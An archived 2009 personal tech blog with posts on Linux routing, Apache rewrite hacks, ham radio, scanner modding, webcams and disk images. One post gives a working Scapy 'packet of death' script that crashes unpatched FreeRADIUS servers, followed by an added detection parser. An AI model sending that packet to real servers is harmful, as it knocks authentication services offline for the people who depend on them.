Archive for the ‘What?!’ Category

Multiple WAN linux-based router

Posted on November 20th, 2009 in What?! | No Comments »

My friend Mat recently asked how difficult it is to build your own router. He’s living in a house with 4 or 5 other guys, and two Internet connections (one for work purposes, the other apparently comes with the house).

My immediate suggestion was to grab an old Sun Cobalt Raq server. My former router was based off a Qube3 picked up off ebay for less than $80.00. The things are great: low power consumption, two NICs, an LCD screen, a trippy green LED panel….

Fear my awesome green LED

USB, Serial, and 2 ethers

There are numerous walkthroughs on how to turn these things into mailservers, etc… (google for them). The basic gist of what one needs to do is:

  • Upgrade the ROM. This has fixes for 2.6 kernels as well as support to boot from an ext3 filesystem.
  • Install the root filesystem on the drive(s). This can be done by mounting the IDE drives in another box, or using an nfs server to install from the Qube itself.
  • Compile a kernel. While there are many patches out there, I’ve found that (possibly aside from the LCD screen, which I’ve never bothered with) a vanilla 2.6 kernel will work fine.

Nothing that’s too incredibly different from setting up a normal box. I would highly recommend two resources: the first is Braggtown, the second is Tim and Tina Wiley’s site.

As far as items to install: I’m personally using Quagga for static routing and OSPF (I use the Cobalt as a route server; Quagga also has a nice Cisco-like CLI), OpenSwan for VPN access, VTUN for a quick tunnel here and there (over which I run OSPF), Roaring Penguin L2TP for various layer 2 tunnels, etc.

Iproute2 makes it possible to properly handle multiple WAN connections via multiple routing tables. There are 255 tables available for routing, and iproute2 makes the use of named tables easy – simply add the numeric value and table name to /etc/iproute2/rt_tables.

When working with multiple WAN interfaces, I generally set up the second routing table and rules similar to this:

ip route add default via <gateway for this connection> dev <interface> table <tablename>

ip rule add from <WAN IP> table <tablename>

The above adds a default route via that connection’s gateway to the new table, plus a rule that sends traffic sourced from the WAN IP to that table. To restrict a machine on the internal LAN to ONLY use the newly defined routing table, one can simply:

ip rule add from 192.168.32.10 table <tablename>

ip rule add to 192.168.32.10 table <tablename>

Depending on your default policy, you may need to make alterations to your iptables rules as well (especially to support forwarding and NAT masquerading). You can also hook into TOS flags (amongst other things) and route based on port numbers, etc. Basically the sky is the limit (you can do round-robin routing out interfaces, etc).

Next up is IPv6. IPv6 tunnels are easy to come by these days – Hurricane Electric and Sixxs.net are two of the more popular tunnel-brokers, MyBSD is a Malaysian broker I would personally recommend (good for IRC, latency is high, it goes down semi-frequently.. but I like Malaysia).  Also be aware that some brokers block common IRC ports. (Luckily I’m currently testing IPv6 for the ISP I work for and am now working off our /32)

Quagga can handle IPv6 address auto-assignment on your LAN. By default, ipv6 nd suppress-ra is set on almost all interfaces. Disable it on the LAN interface, slap an IPv6 address and subnet in that interface config – and voila – your IPv6 router is now handling IPv6 autoconfiguration.

I recently upgraded to using a small form-factor IBM ThinkCentre 8183B2U.

The ThinkCenter, with KnightRider eyes

ThinkCenter with a Courier dialup modem and 3 USB drives atop it

The power consumption is also fairly low (I believe), and wanting to do a little more with the router, I figured why not spend another $80. Of course, the downside to the ThinkCentre is having only 1 on-board NIC and 2 PCI slots. In the near future I plan on picking up a quad-port LINKX ethernet card, to consolidate cards (I presently have 2 PCI NICs added to the router for connections to the LAN and a monitoring tap). Hopefully I can find a quad port card that will fit in the small form-factor.

And excuse the mess, I’ve yet to make things “pretty”.

The “Fish” turns 111,111

Posted on November 3rd, 2009 in What?! | No Comments »

My car (nicknamed “The Fish” for its fishlike appearance) just celebrated a birthday of sorts.

First of all, the car is a 1999 Ford Taurus SE, and as you can see in this dealer picture – it has all of the features of an aquatic animal – two bulbous eyes, two smaller “nostril” looking things, sideview mirrors that could possibly be fins, and a mouth where the Ford emblem is.

The FISH! (Well, another Fish)

I’ve been working for a while on the possibility of using a WebpadDT as a touchscreen for a car pc. The inside of the Fish is huge – but at 8 inches or so, the WebpadDT takes up a lot of space. On the other hand, it’s quite a bit cheaper than a lilliput screen.

While driving home this weekend, I looked down and noticed an upcoming milestone:

111,108 miles

I got the camera ready – almost at 111,111 miles. Good Old Lucky 111,111 – make a wish!
Well… maybe not. Turns out 111,108 is an unlucky number:

My Brake Light is Out.

My brake light was apparently out. A quick notice from the cop, and I was on my way. Being only about a mile from my house meant I had to drive around the block a few times, but finally I hit it:

111,111 miles

DirectorySlash Hacking

Posted on October 27th, 2009 in What?! | No Comments »

The other day I came across the following scenario: A customer wanted to use Apache proxying to hide the virtual hostname that his customers were really pulling content from. The rewrite rule on the “masking host” (which I refer to as www.proxy.net in these examples) is easy enough:

RewriteRule ^/~(.*)$ http://user.proxiedto.net/~$1 [P]

Which works pretty well:

How the mod_rewrite [P] works.

The problem is what happens when DirectorySlash is enabled on the proxied-to host (which it is by default). DirectorySlash fixes up requests for a directory that are missing the trailing forward slash, for example:

GET /~gillespiem/images HTTP/1.1
Host: www.proxy.net

In this instance, you get a 301 redirect that appends a “/” to the end of the request BUT also sets the Location header to the proxied-to virtual hostname. The jig is up – and now the address bar in the browser indicates the real host the end-user is speaking to:

When mod_rewrite [P] and DirectorySlash collide.

Here’s a snippet of response from the site:

HTTP/1.1 301 Moved Permanently
Date: Tue, 27 Oct 2009 16:28:27 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://user.proxiedto.net/~gillespiem/images/

I’ve not been able to find an easy way to change what DirectorySlash uses in the Location header (maybe you can’t). DirectorySlash is important, so simply not using it won’t work in this application. Instead, I opted to use a RewriteMap to simply write my own version, DirectorySlashHack, and enable it in the vhost container (on the proxy-to site) à la:

DirectorySlash off
RewriteMap directoryslashhack        prg:/etc/httpd/maps/directoryslashhack
RewriteRule ^/~([^/]+)(/?.*)         ${directoryslashhack:%1*$1*$2}

While the solution is hack-ish (and the script and rewriterule could use a small bit of cleanup), it seems to work so far. The perl script determines if the requested resource is a directory, and if so it issues the appropriate 301 redirect using a customizable location header (which allows me to force the cleaned-up request back to the proxy).

Freeradius Packet of Death

Posted on September 11th, 2009 in What?! | 1 Comment »

I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by software bugs in L2TP sequencing on the Telco router on the other end… their vendor has confirmed the problems).

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet; thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
    print("Usage: radius_killer.py <radiushost>\n")
    sys.exit(1)

# Access-Request (code=1) carrying attribute 69 with an empty value (len=2)
PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
    Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
    RadiusAttr(type=69,value="",len=2)

send(PoD)

Interestingly, one doesn’t need a shared key to send the packet of death; as you can tell, the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.
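
A defensive counterpart to the script above, added here as an example and not part of the original post: a Python 3 parser that walks the attributes of a captured RADIUS datagram and flags the pattern that script sends (an Access-Request carrying attribute 69, Tunnel-Password, with an empty value). The sample datagrams are constructed for illustration, and the function names are assumptions of this example.

```python
import struct

ACCESS_REQUEST = 1      # RADIUS code, RFC 2865
TUNNEL_PASSWORD = 69    # attribute type, RFC 2868
HEADER_LEN = 20         # code + id + length + 16-byte authenticator


def parse_radius(payload):
    """Return (code, [(attr_type, value_bytes), ...]) for one UDP payload.

    Raises ValueError when the framing breaks the RFC 2865 layout.
    """
    if len(payload) < HEADER_LEN:
        raise ValueError("shorter than the RADIUS header")
    code, _ident, length = struct.unpack("!BBH", payload[:4])
    if length < HEADER_LEN or length > len(payload):
        raise ValueError("length field does not fit the datagram")
    attrs, pos = [], HEADER_LEN
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        attr_type, attr_len = payload[pos], payload[pos + 1]
        # attr_len counts the type and length bytes, so 2 means "no value".
        if attr_len < 2 or pos + attr_len > length:
            raise ValueError("attribute length out of range")
        attrs.append((attr_type, payload[pos + 2:pos + attr_len]))
        pos += attr_len
    return code, attrs


def inspect_datagram(payload):
    """List the reasons a datagram deserves a closer look (empty if none)."""
    try:
        code, attrs = parse_radius(payload)
    except ValueError as exc:
        return ["malformed: %s" % exc]
    findings = []
    for attr_type, value in attrs:
        if attr_type != TUNNEL_PASSWORD:
            continue
        if code == ACCESS_REQUEST:
            # RFC 2868 allows Tunnel-Password only in Access-Accept.
            findings.append("Tunnel-Password in Access-Request")
        if not value:
            findings.append("zero-length Tunnel-Password")
    return findings


def build(code, ident, attrs):
    """Assemble a constructed test datagram with an all-zero authenticator."""
    body = b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)
    header = struct.pack("!BBH", code, ident, HEADER_LEN + len(body))
    return header + b"\x00" * 16 + body


# Constructed samples, not captured traffic.
SUSPECT = build(ACCESS_REQUEST, 180, [(TUNNEL_PASSWORD, b"")])
NORMAL = build(ACCESS_REQUEST, 7, [(1, b"alice"), (4, bytes([192, 0, 2, 10]))])

if __name__ == "__main__":
    for name, pkt in (("suspect", SUSPECT), ("normal", NORMAL),
                      ("truncated", NORMAL[:-1])):
        print(name, inspect_datagram(pkt))
```

Feed it the UDP payload of each datagram seen on port 1812, for example from a capture taken on the RADIUS server’s interface.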

RIP Milw0rm

APRS using Xastir

Posted on September 9th, 2009 in What?! | No Comments »

A couple months back, I finally took my Amateur Radio Technician’s exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copious amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amateur licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

Xastir focused on Central Pennsylvania

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennessee, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equipped w/ APRS)

The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

Yaesu-VX7R with a CT-91 cable attached.

With the amateur license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)

Happy Birthday: The Great Internet Migratory Box Of Electronics Junk

Posted on July 2nd, 2009 in What?! | No Comments »

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself on the list…

Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)

Adding a discriminator to a BC80XLT Scanner

Posted on May 28th, 2009 in RF, What?! | No Comments »

Adding a discriminator to the Uniden Bearcat BC80xlt scanner isn’t an incredibly difficult task. BC80xlt discriminator

Simply find pin 9 of the MC3361 chip, and connect a 2.2nF capacitor connected to a 10k ohm resistor, w/ a small piece of wire to go to a 3.5mm headphone jack. The capacitor connects to the radio shield, and that’s about it (I suggest you follow the steps above).

My BC80XLT

My BC80xlt is slightly different than in the pictures in the link above. In some ways, it’s closer to the BC60-xlt-2. The innards of my device include a main board, connected to a daughterboard. The “down” side of the daughterboard has the chip, the “top” side has the shield. This requires one to route the discriminator around the daughterboard, avoiding contact with anything accidentally. My soldering job is pathetic (I have no illusions about that). In my defense I am using a rusty tip which doesn’t conduct very well, but beyond that I really have no excuse aside from not being that skillful. My big concern was damage to the MC3361 by heat from the soldering iron. In fact, later I realized I was using a 30 Watt iron – not the specified 15 Watt. (D’oh!) Turning it back on yields no apparent difference, so hopefully all is well.

Yes, I know..

Connection to pin 9

Yes, I know

Connection to the shield

Here’s how the two separate parts of my scanner look:

The top and bottom, which connect together

The connection to the 3.5mm jack

The 3.5mm discriminator tap

I had to make a few additional modifications. First of all, I removed the former cap and resistor (seen above), and replaced it with a much better soldered joint (practiced for a bit prior to doing so). The 3.5mm jack has one problem – when pushed in all the way the male connector actually makes contact with the grounded shield (that’s bad). The shield doesn’t appear to get hot, so I’ve used a small piece of plastic to prevent that from happening. Now everything fits snug, and this works great.

The Intel QX3 Microscope

Posted on May 18th, 2009 in What?! | No Comments »

Well, the bad news is the ant colony I was rearing has died off. I’m unsure what the problem was, but the ant queen was found dead, followed by the only two offspring dying a couple of days later.

I don’t have a decent digital camera that can take decent pictures of something as small as an ant, and I came across an old article detailing an interesting children’s toy: The Intel QX3 microscope.

The QX3 Microscope

It was released about 10 years ago, so I’m obviously behind the times. The resolution isn’t the greatest (the QX3 is a first-gen, but the QX5 has some improvements including better resolution).

The device runs well on Linux; you need the following configuration options (in addition to normal USB drivers):

CONFIG_VIDEO_CPIA=m

CONFIG_VIDEO_CPIA_USB=m

The camera (the microscope is basically a webcam) has a number of interesting settings, all touchable via the /proc filesystem:

--------                 current    min        max        default    comment
brightness:              50         0          100        50
contrast:                48         0          96         48         steps of 8
saturation:              50         0          100        50
sensor_fps:              3.750      3          30         15
stream_start_line:       240        0          288        240
sub_sample:              422        420        422        422
yuv_order:               YUYV       YUYV       UYVY       YUYV
ecp_timing:              normal     slow       normal     normal
color_balance_mode:      auto       manual     auto       auto
red_gain:                15         0          212        32
green_gain:              31         0          212        6
blue_gain:               39         0          212        92
max_gain:                8          1          8          2          1,2,4 or 8
exposure_mode:           auto       manual     auto       auto
centre_weight:           on         off        on         on
gain:                    4          1          max_gain   1          1,2,4,8 possible
fine_exp:                2          0          510        0
coarse_exp:              302        0          302        185
red_comp:                220        220        255        220
green1_comp:             214        214        255        214
green2_comp:             214        214        255        214
blue_comp:               230        230        255        230
apcor_gain1:             0x18       0x0        0xff       0x1c
apcor_gain2:             0x16       0x0        0xff       0x1a
apcor_gain4:             0x24       0x0        0xff       0x2d
apcor_gain8:             0x34       0x0        0xff       0x2a
vl_offset_gain1:         20         0          255        24
vl_offset_gain2:         24         0          255        28
vl_offset_gain4:         26         0          255        30
vl_offset_gain8:         26         0          255        30
flicker_control:         off        off        on         off
mains_frequency:         50         50         60         50         only 50/60
allowable_overexposure:  141auto    auto       255        auto
compression_mode:        auto       none,auto,manual      auto
decimation_enable:       off        off        on         off
compression_target:      quality    framerate  quality    quality
target_framerate:        15         1          30         15
target_quality:          5          1          64         5
y_threshold:             12         0          31         6
uv_threshold:            11         0          31         6
hysteresis:              3          0          255        3
threshold_max:           11         0          255        11
small_step:              1          0          255        1
large_step:              3          0          255        3
decimation_hysteresis:   2          0          255        2
fr_diff_step_thresh:     5          0          255        5
q_diff_step_thresh:      3          0          255        3
decimation_thresh_mod:   2          0          255        2
toplight:                off        off        on         off
bottomlight:             off        off        on

You can alter any of these settings by doing something like:

echo "bottomlight: on" > /proc/cpia/videoX

(I’ve found that you need to have the camera actively in use for these settings changes to actually work).

Two programs work well with the camera – xawtv and tvtime. TvTime has a few minor issues that I’ve yet to work out, but I’ll figure that out eventually (namely the buffer isn’t filling up properly). XawTV has an issue with screencaptures – again an issue I’ll work out shortly.

For better images, I’ve found that setting sensor_fps to 10 works well. Once I have a specimen on the slide and in proper position, I drop that to 3 to actually take the image.

As I mentioned earlier, the resolution isn’t that great.  I’ve been told lighting is the key, and I’m still experimenting. Here’s the head of the queen ant, I’m sure of species:

Queen ant, taken w/ QX3

Pinnacle PCTV Pro

Posted on May 16th, 2009 in What?! | No Comments »

My old BrookTree Tuner card died recently. I only used it for basic chores – backup of VHS tapes, maybe watching the Deadliest Catch while I worked…

My old generic card (if you want it, pay for shipping and it's yours)

Everyone online is building DTRs using the latest technology, but that’s not how I generally work. Cheap and worthy is about the only qualification I have – and you can pick up a nice Pinnacle PC-TV Pro online for $25.00. (ebay)

The bigger problem is determining the tuner… a difficult task to do when looking at a picture of an item on ebay. When doing research on a BTTV card – I’ve got to recommend http://www.bttv-gallery.de/

Someone thankfully put a lot of research into this site. If you search around, there’s a lot of griping on the internet about “the tuner doesn’t work on so-and-so card”. Using this site, I was able to easily discern different revisions of AcerTV and Pinnacle cards – which is important when you plan on using the card under Linux.

So, here’s my card:

01:07.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11)
Subsystem: Pinnacle Systems Inc. PCTV pro (TV + FM stereo receiver, audio section)
Flags: bus master, medium devsel, latency 64, IRQ 17
Memory at fc0fe000 (32-bit, prefetchable) [size=4K]
Capabilities: [44] Vital Product Data <?>
Capabilities: [4c] Power Management version 2
Kernel driver in use: Bt87x

I’ve found that for sound support, you want to make sure to load the “tuner” module PRIOR to inserting the “bttv” module (otherwise you’ll end up with no sound). The module options that worked for me were: "bttv card=39" and "tuner=33". If you’re looking for a full list of card and tuner numbers, look at the Linux source Documentation/video4linux/CARDLIST*

For viewing, I’m using xawtv and tvtime. I’m still fighting w/ sound issues – one _should_ be able to either set /dev/dsp1 (the bt card on my system) as the audio source – but I’ve yet to get that to work correctly.

One can also use SOX to pipe /dev/dsp1 to /dev/dsp0, but I’m still battling w/ that. I believe the following should work, but have yet to get it to execute w/o throwing errors:

sox -q -c 2 -s -r 32000 -t alsa hw:1 -t alsa -r 32000 hw:0

My current workaround is a simple 3.5mm male/male connector to connect the output of the PCTV Pro to the Aux Input of the onboard soundcard.

Recording from the card is fairly easy, too. XawTV has an application called “streamer”, but I’m much more inclined to use mencoder (part of the mplayer package):

mencoder -oac mp3lame -ovc lavc -lameopts mode=1:vbr=2:q=4 -lavcopts vcodec=mpeg4 -tv driver=v4l:norm=ntsc:channel=3:chanlist=us-cable:adevice=/dev/dsp:width=640:height=480 -af volume=-25 -o /tmp/tv.avi tv://


Mounting a raw dump (using dd and losetup)

Posted on March 10th, 2009 in What?! | 1 Comment »

I’ve just picked up a DT Research WebDT366 Tablet. I’m in need of a good touchscreen for a CarPC project, and the Lilliputs are a little more expensive than I had hoped to go (approx. $250.00 on eBay).

First boot (I'm finishing up the Gentoo Linux Image)

The WebDT366 was only $90 (in fairly good condition), and I figured if I didn’t end up using it for a CarPC (or as simply the touchscreen for the CarPC), I could certainly find something else to do w/ it.

tschak909 has already done a good amount of work getting Linux to run on the device. (http://forum.linuxmce.org/index.php?topic=6663.0). Thankfully it’s x86, so life should be a little easier when building custom images.

Wanting to know what packages and configuration Thom has used in his installation, I needed a way to mount the raw disk image (http://www.localeconcept.com/private/webpad-beta2.dd.bz2). Googling didn’t get me to the exact answer, but it got me close enough to figure it out.

First off, use losetup and an offset (flagged by -o). When running “file” on the image, you’ll see something like this:

lennybruce ~ # file /tmp/webpad-beta2.dd
/tmp/webpad-beta2.dd: x86 boot sector; partition 1: ID=0x83, active, starthead 1, startsector 63, 1023057 sectors

As you can see, partition one starts at sector 63. (512 bytes * 63 = 32256). Having this information, mounting is easy:

lennybruce ~ # losetup -o 32256 /dev/loop0 /tmp/webpad-beta2.dd
lennybruce ~ # mount /dev/loop0 /mnt/loop
lennybruce ~ # ls /mnt/loop/
bin   cdrom  etc   initrd      lib         media  opt   root  selinux  sys   tmp  var
boot  dev    home  initrd.img  lost+found  mnt    proc  sbin  srv      temp  usr  vmlinuz
lennybruce ~ #

That’s it for mounting a raw disk image. Using the information Thom has provided in his image (video driver, input drivers, etc)… I’m building a custom Gentoo image that will hopefully be the basis or front-end of a CarPC.
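
The offset arithmetic above, generalised in an added example that is not part of the original post: a Python 3 reader for the MBR partition table that returns the byte offset and size of every primary partition, plus the matching read-only losetup line. The sample MBR is constructed from the values in the file output above; the function names and the choice of /dev/loop0 are assumptions of this example.

```python
import struct

SECTOR_SIZE = 512            # sector size used in the calculation above
TABLE_OFFSET = 446           # the partition table starts here in the MBR
EXTENDED_TYPES = {0x05, 0x0F, 0x85}   # containers, not filesystems
GPT_PROTECTIVE = 0xEE


def read_partitions(mbr, sector_size=SECTOR_SIZE):
    """Decode the four primary entries of an MBR into dicts."""
    if len(mbr) < 512 or mbr[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature")
    parts = []
    for index in range(4):
        start_byte = TABLE_OFFSET + 16 * index
        entry = mbr[start_byte:start_byte + 16]
        # status, CHS start, type, CHS end, LBA start, sector count
        status, _chs0, ptype, _chs1, lba, count = struct.unpack(
            "<B3sB3sII", entry)
        if ptype == 0 or count == 0:
            continue                      # unused slot
        if ptype == GPT_PROTECTIVE:
            raise ValueError("protective MBR: read the GPT instead")
        parts.append({
            "number": index + 1,
            "type": ptype,
            "active": status == 0x80,
            "mountable": ptype not in EXTENDED_TYPES,
            "offset": lba * sector_size,
            "sizelimit": count * sector_size,
        })
    return parts


def losetup_command(image, part, loopdev="/dev/loop0"):
    """Read-only losetup line limited to one partition of the image."""
    return "losetup -r -o %d --sizelimit %d %s %s" % (
        part["offset"], part["sizelimit"], loopdev, image)


def sample_mbr():
    """Constructed MBR: one active type 0x83 partition at sector 63."""
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x83,
                        b"\xfe\xff\xff", 63, 1023057)
    return b"\x00" * TABLE_OFFSET + entry + b"\x00" * 48 + b"\x55\xaa"


if __name__ == "__main__":
    for part in read_partitions(sample_mbr()):
        print(losetup_command("/tmp/webpad-beta2.dd", part))
```

For a real image, pass the first 512 bytes of the file to read_partitions(); the -r and --sizelimit flags keep the loop device read-only and confined to the one partition.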